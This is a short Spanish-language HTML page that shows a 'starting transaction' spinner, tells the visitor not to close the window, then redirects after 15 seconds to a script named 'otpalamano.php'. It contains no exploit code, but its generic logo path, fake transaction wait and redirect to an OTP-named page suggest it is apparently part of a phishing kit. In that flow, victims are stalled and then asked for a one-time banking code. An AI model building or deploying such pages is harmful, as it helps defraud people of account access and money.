<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Iniciando transacion, Espera..</title>
  <script src="./js/jquery-3.6.0.min.js"></script>
  
  <style>
    * {
      margin: 0;
      padding: 0;
      box-sizing: border-box;
    }

    body {
      font-family: 'Open Sans', sans-serif;
      background-color: #f0f0f0; 
      display: flex;
      flex-direction: column;
      min-height: 100vh;
      justify-content: center;
      align-items: center;
    }

    .header {
      position: absolute;
      top: 0;
      width: 100%;
      display: flex;
      justify-content: center;
      align-items: center;
      background-color: white;
    }

    .logo img {
      width: 220px; 
    }

    #preloader {
      display: flex;
      flex-direction: column;
      align-items: center;
      justify-content: center;
      z-index: 9999;
      margin-top: -150px;
    }

    .big-circle {
      width: 150px;
      height: 150px;
      background-color: white;
      border-radius: 50%;
      display: flex;
      flex-direction: column;
      align-items: center;
      justify-content: center;
      box-shadow: 0 4px 20px rgba(0, 0, 0, 0.2);
    }

    .spinner {
      width: 40px;
      height: 40px;
      border: 4px solid #ccc; 
      border-top: 4px solid #fff; 
      border-radius: 50%;
      animation: spin 1s linear infinite;
      margin-bottom: 10px;
    }

    .loading-text {
      font-size: 14px;
      color: #333;
    }

    /* Animación de spinner */
    @keyframes spin {
      0% { transform: rotate(0deg); }
      100% { transform: rotate(360deg); }
    }
  </style>
</head>
<body>
  <header class="header">
    <div class="logo">
      <img src="tom/logo.svg" alt="Logo">
    </div>
  </header>
  
  <div id="preloader">
    <div class="big-circle">
      <div class="spinner"></div>
      <p class="loading-text">...Iniciando <br>Transacción...</p>
      
    </div>
  </div>
  
 
  <script>
    // Función para cambiar el texto después de 10 segundos
    setTimeout(function() {
        document.querySelector('.loading-text').textContent = 'Espere un momento, no cierres esta ventana';

        // Después de cambiar el texto, redirigir a otra página
        setTimeout(function() {
            window.location.href = '../amano/otpalamano.php'; // Cambiar la URL a la que deseas redirigir
        }, 5000); // Redirigir después de 5 segundos (5000 milisegundos)
    }, 10000); // Cambiar el texto después de 10 segundos (10000 milisegundos)
</script>
</body>
</html>
